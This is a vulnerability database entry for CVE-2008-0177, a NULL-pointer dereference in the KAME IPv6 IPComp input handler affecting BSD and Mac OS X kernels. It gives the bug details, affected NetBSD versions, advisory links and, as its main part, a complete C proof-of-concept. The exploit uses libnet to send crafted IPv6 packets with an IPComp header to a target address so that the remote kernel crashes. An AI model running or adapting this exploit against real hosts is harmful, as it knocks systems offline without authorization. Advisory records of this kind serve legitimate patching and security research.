KAME Project IPv6 IPComp Header Remote Denial of Service Vulnerability

Vulnerability ID: 1114671
Vulnerability type: Design error
Published: 2008-02-26
Updated: 2008-07-11
CVE: CVE-2008-0177
CNNVD ID: CNNVD-200802-105
Platform: Multiple
CVSS score: 7.8
|Sources
https://www.exploit-db.com/exploits/5191
https://www.securityfocus.com/bid/27642
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-105
|Details
The KAME Project is a free IPv6, IPsec and Mobile IPv6 implementation for various BSD systems, developed jointly by six Japanese companies. The IPv6 stack implemented by the KAME project contains a vulnerability that a remote attacker could exploit to make a server unavailable. On BSD systems that use the KAME IPv6 stack, the ipcomp6_input() function in kame/sys/netinet6/ipcomp_input.c dereferences a NULL pointer while processing an IPv6 packet that carries an IPComp header. If the kernel is configured to process IPsec and IPv6 traffic, a single crafted IPv6 packet can cause a denial of service (system crash).
|Exploit (PoC)
/* xnu-ipv6-ipcomp.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
 * by mu-b - Sun 24 Feb 2008
 *
 * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
 *              Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
 *
 * ipcomp6_input does not verify the success of the first call
 * to m_pulldown (m -> md typo?).
 *
 *         md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
 *         if (!m) {
 * ->
 *         md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
 *         if (!md) {
 *                                    (bsd/netinet6/ipcomp_input.c)
 *
 * curiously the same bug exists in ipcomp4_input, but an explicit
 * check is made to ensure there is enough space for the struct ipcomp.
 *
 * Note: bug independently found by Shoichi Sakane of the KAME project.
 *       (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
 *          (http://www.kb.cert.org/vuls/id/110947)
 *          (http://www.securityfocus.com/bid/27642)
 *          (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <arpa/inet.h>
#include <ifaddrs.h>
#include <libnet.h>
#include <net/if.h>       /* IFF_UP */
#include <netinet/in.h>   /* struct sockaddr_in6 */
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define IPV6_INTERFACE    "eth0"
#define IPV6_SRC_OFFSET   8
#define IPV6_DST_OFFSET   24

#define HAMMER_NUM        8

static unsigned char pbuf[] = 
  "\x60"
  "\x00\x00\x00"
  "\x00\x00"      /* plen = 0           */
  "\x6c"          /* nxt_hdr = IPComp   */
  "\x66"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

static int
get_localip (char *if_name, unsigned int *ip6_addr)
{
  struct ifaddrs *ifa_head;
  int result;

  result = -1;
  if (getifaddrs (&ifa_head) == 0)
    {
      struct ifaddrs *ifa_cur;

      ifa_cur = ifa_head;
      for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
        {
          if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
            {
              if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
                  ifa_cur->ifa_addr->sa_family != AF_INET6 ||
                  !(ifa_cur->ifa_flags & IFF_UP))
                continue;

              memcpy (ip6_addr,
                      &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
                      sizeof (int) * 4);
              result = 0;
              break;
            }
        }

      freeifaddrs (ifa_head);
    }

  return (result);
}

int
main (int argc, char **argv)
{
  char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
  unsigned int i, ip6_addr[4];
  libnet_t *lnsock;

  printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc < 2)
    {
      fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  if (get_localip (IPV6_INTERFACE,
                   (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
    {
      fprintf (stderr, "* get_localip() failed\n");
      exit (EXIT_FAILURE);
    }

  if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
    {
      fprintf (stderr, "* inet_pton() failed\n");
      exit (EXIT_FAILURE);
    }
  memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);

  lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
  if (lnsock == NULL)
    {
      fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
      exit (EXIT_FAILURE);
    }

  inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
  printf ("* local ipv6 %s...\n", ip6_buf);
  printf ("* attacking %s...", argv[1]);
  for (i = 0; i < HAMMER_NUM; i++)
    libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
  printf ("done\n");

  return (EXIT_SUCCESS);
}

// milw0rm.com [2008-02-26]
|Affected products
NetBSD 3.0.2
NetBSD 3.0.1
NetBSD 2.1
NetBSD 2.0.3
NetBSD 2.0.2
NetBSD 2.0.1
NetBSD 2.0
|References
Source: US-CERT
Name: VU#110947
Link: http://www.kb.cert.org/vuls/id/110947
Source: US-CERT
Name: TA08-150A
Link: http://www.us-cert.gov/cas/techalerts/TA08-150A.html
Source: BID
Name: 27642
Link: http://www.securityfocus.com/bid/27642
Source: SECUNIA
Name: 28788; Patch Information
Link: http://secunia.com/advisories/28788
Source: www.kame.net
Link: http://www.kame.net/dev/cvsweb2.cgi/kame/kame/sys/netinet6/ipcomp_input.c.diff?r1=1.36;r2=1.37
Source: VUPEN
Name: ADV-2008-2094
Link: http://www.frsirt.com/english/advisories/2008/2094/references
Source: SECUNIA
Name: 31074
Link: http://secunia.com/advisories/31074
Source: SECUNIA
Name: 28816
Link: http://secunia.com/advisories/28816
Source: APPLE
Name: APPLE-SA-2008-07-11
Link: http://lists.apple.com/archives/security-announce/2008//Jul/msg00001.html
Source: cvsweb.netbsd.org
Link: http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?f=u&only_with_tag=netbsd-3-1
Source: MILW0RM
Name: 5191
Link: http://www.milw0rm.com/exploits/5191
Source: VUPEN
Name: ADV-2008-1697
Link: http://www.frsirt.com/english/advisories/2008/1697
Source: VUPEN
Name: ADV-2008-0688
Link: